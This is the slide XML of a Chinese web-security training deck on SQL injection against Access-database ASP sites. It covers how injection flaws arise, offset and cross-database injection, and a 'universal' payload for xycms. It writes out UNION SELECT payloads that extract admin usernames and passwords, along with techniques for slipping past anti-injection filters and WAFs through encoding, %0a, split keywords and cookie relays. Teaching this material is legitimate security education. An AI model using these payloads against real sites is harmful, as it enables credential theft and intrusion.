            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>password为数据库中admin表的段.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>http://xxx.com/news/type.asp?type?id=1 and 1=2 union select 1,2,user,4,5,6 from [D:\wwwroot\1\Databases\xycms.mdb].admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1451 union select 1,2,username,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from [D:\wwwroot\1\Databases\xycms.mdb].admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1:99/0/Production/PRODUCT_DETAIL.asp?id=-1513%20UNION%20SELECT%201,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22%20from%20admin_user%20in%20'C:\Users\Seven\Desktop\webpentest\1\xydata\xycms.mdb'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079" y="544830"/>
            <a:ext cx="11308615" cy="585470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造 同类型站点的查询语句  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0d.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>里面全部都是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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xycms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通杀注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exp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union select 1,admin,3,4,password,6,7 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin_user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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25" y="0"/>
            <a:ext cx="5946775" cy="585470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用型防注入代码绕过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25" y="585470"/>
            <a:ext cx="11194636" cy="59743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、自动防护代码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、软甲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf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南方数据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处理方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>变换提交方式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Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>提交  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>首先需要验证该提交方式正常情况能否执行成功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url:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://192.168.149.130:86/news.asp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Body : id=11 and 1=1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Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>借助 注入中转 建议放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>虚拟机下运行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http://192.168.149.130:86/shownews.asp?id=5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> –-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>url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工具使用说明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注入键名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:id=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注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.149.130:86/shownews.asp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来源页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.149.130:86/shownews.asp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Post </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>提交值 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>jmdcw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值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完成设置以后生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，覆盖，启动小旋风 点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>jmdcw.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>页面，在后面添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>? ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>jmdcw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=5  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>后面一切如常规手工测试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http://127.0.0.1:99/jmCook.asp?jmdcw=5 order by 11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http://127.0.0.1:99/jmCook.asp?jmdcw=5 union select 1,2,password,4,5,6,7,8,9,10,11 from admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>得到密码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15" y="147265"/>
            <a:ext cx="5946775" cy="585470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用型防注入代码绕过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826" y="732735"/>
            <a:ext cx="11012557" cy="651620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通用弹框拦截</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>改变数据提交方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代码防御</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代替空格  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://192.168.149.130:84/common.asp?id=16+++++and+1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代替空格</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://192.168.149.130:84/common.asp?id=16++and%%%%%%%%%%%%0a1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.149.130:84/common.asp?id=16%%%%%%%%%%%%%0aand%%%%%%%%%%%%0a1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>如果检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关键字   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>添加在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中间 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.149.130:84/common.asp?id=16%%%%%%%%%%%%%0aa%%n%%d%%%%%%%%%%%%0a1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>提交  貌似能过最新的安全狗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>id=16%%%%%%%%%%%%%0aa%%n%%d%%%%%%%%%%%%0a1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>编码绕过、大小写绕过  编码次数过多会导致不识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>混合使用绕过  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>包括变换提交方式、大小写、使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、编码全部结合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 err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>tamper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掌握注入漏洞形成原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>学会手工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>学会挖掘注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>学会偏移、代码绕过注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>学会工具利用注入漏洞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1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入漏洞形成原理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Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网站分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202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endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="357505" lvl="0" indent="-357505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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>静态网页：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html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，是一种静态的页面格式，不需要服务器解析其中的脚本。由浏览器如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(IE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解析。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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不依赖数据库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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>灵活性差，制作、更新、维护麻烦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3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>交互性较差，在功能方面有较大的限制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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全，不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞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endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="357505" lvl="0" indent="-357505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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>动态网页：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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，由相应的脚本引擎来解释执行，根据指令生成静态网页。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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>依赖数据库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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>灵活性好，维护简便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3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>交互性好，功能强大</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just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None/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在安全风险，可能存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞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Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>数据库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4573" y="2016443"/>
            <a:ext cx="6977063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(带强调线) 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240973" y="2290128"/>
            <a:ext cx="1084263" cy="3508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35"/>
              <a:gd name="adj6" fmla="val -413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字段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69" y="4561873"/>
            <a:ext cx="423631" cy="415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线形标注 2(带强调线) 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419793" y="3496945"/>
            <a:ext cx="1008063" cy="3508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257"/>
              <a:gd name="adj6" fmla="val -5095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线形标注 2(带强调线) 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4943793" y="3364865"/>
            <a:ext cx="942975" cy="3508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587"/>
              <a:gd name="adj6" fmla="val -2125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pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mssql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 err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Db2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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4557" y="2464618"/>
            <a:ext cx="4259263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17" y="4636318"/>
            <a:ext cx="2478087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01" y="2648600"/>
            <a:ext cx="4310827" cy="171326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网站访问模型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2031473" y="1971062"/>
          <a:ext cx="756084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漏洞成因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37100" y="5172902"/>
            <a:ext cx="2735263" cy="5048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客 户 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4737100" y="1932815"/>
            <a:ext cx="2735263" cy="576263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 据 库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7100" y="3588577"/>
            <a:ext cx="2735263" cy="5048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脚本引擎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935163" y="4806190"/>
            <a:ext cx="2420938" cy="1284288"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 86714"/>
              <a:gd name="adj2" fmla="val 19356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用户想要查看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的文章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5089525" y="4237865"/>
            <a:ext cx="504825" cy="792163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请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545263" y="4237865"/>
            <a:ext cx="495300" cy="79216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返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回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1935163" y="3893377"/>
            <a:ext cx="2420938" cy="912813"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 98337"/>
              <a:gd name="adj2" fmla="val 46731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http://cracer.com/Article.asp?id=36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089525" y="2648777"/>
            <a:ext cx="504825" cy="792163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请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545263" y="2648777"/>
            <a:ext cx="495300" cy="79216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返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回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2216150" y="2869440"/>
            <a:ext cx="1944688" cy="935038"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 76059"/>
              <a:gd name="adj2" fmla="val 40121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获取参数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的值为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36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，动态构造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SQL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语句：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Select * from Article where id=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36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，向数据库发起查询请求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2500313" y="1861377"/>
            <a:ext cx="1643063" cy="787400"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 82426"/>
              <a:gd name="adj2" fmla="val 1759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Article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表中查询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的所有记录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8193088" y="2174115"/>
            <a:ext cx="1641475" cy="717550"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90080"/>
              <a:gd name="adj2" fmla="val -4225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返回查询到的所有记录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8193088" y="3229802"/>
            <a:ext cx="2160588" cy="1187450"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79716"/>
              <a:gd name="adj2" fmla="val -2482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处理返回的所有记录，如过滤和编码特殊字符等，生成静态网页并返回给客户端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8193088" y="4903027"/>
            <a:ext cx="2016125" cy="815975"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83339"/>
              <a:gd name="adj2" fmla="val 10371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将网站返回的网页展示给用户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http://eweb55.editor.com/showshop.asp?id=19 and 1=2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679" y="2572053"/>
            <a:ext cx="4729906" cy="3190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6121</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>303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Times New Roman</vt:lpstr>
      <vt:lpstr>方正综艺简体</vt:lpstr>
      <vt:lpstr>Levenim MT</vt:lpstr>
      <vt:lpstr>NumberOnly</vt:lpstr>
      <vt:lpstr>Kozuka Gothic Pro EL</vt:lpstr>
      <vt:lpstr>Yu Gothic UI Light</vt:lpstr>
      <vt:lpstr>Arial Narrow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网站分类</vt:lpstr>
      <vt:lpstr>Access数据库</vt:lpstr>
      <vt:lpstr>常见的数据库</vt:lpstr>
      <vt:lpstr>网站访问模型</vt:lpstr>
      <vt:lpstr>漏洞成因</vt:lpstr>
      <vt:lpstr>Access注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>漏洞挖掘</vt:lpstr>
      <vt:lpstr>判断数据库类型</vt:lpstr>
      <vt:lpstr>ACCESS 注入</vt:lpstr>
      <vt:lpstr>Access逐字猜解法</vt:lpstr>
      <vt:lpstr>Access逐字猜列中的数据 猜解bool盲注</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>注入工具使用</vt:lpstr>
      <vt:lpstr>sqlmap工具简单使用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Access偏移注入 当我们猜出了表名但是猜不出字段名</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>偏移注入</vt:lpstr>
      <vt:lpstr>偏移注入</vt:lpstr>
      <vt:lpstr>垮裤查询  一定是同一套cms 表名、列名一样的</vt:lpstr>
      <vt:lpstr>垮裤查询 </vt:lpstr>
      <vt:lpstr>Exp构造 同类型站点的查询语句  0d.txt里面全部都是</vt:lpstr>
      <vt:lpstr>通用型防注入代码绕过</vt:lpstr>
      <vt:lpstr>通用型防注入代码绕过</vt:lpstr>
      <vt:lpstr>作业：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WEB安全测试</dc:title>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>Pio</cp:lastModifiedBy>
  <cp:revision>162</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-24T15:10:52Z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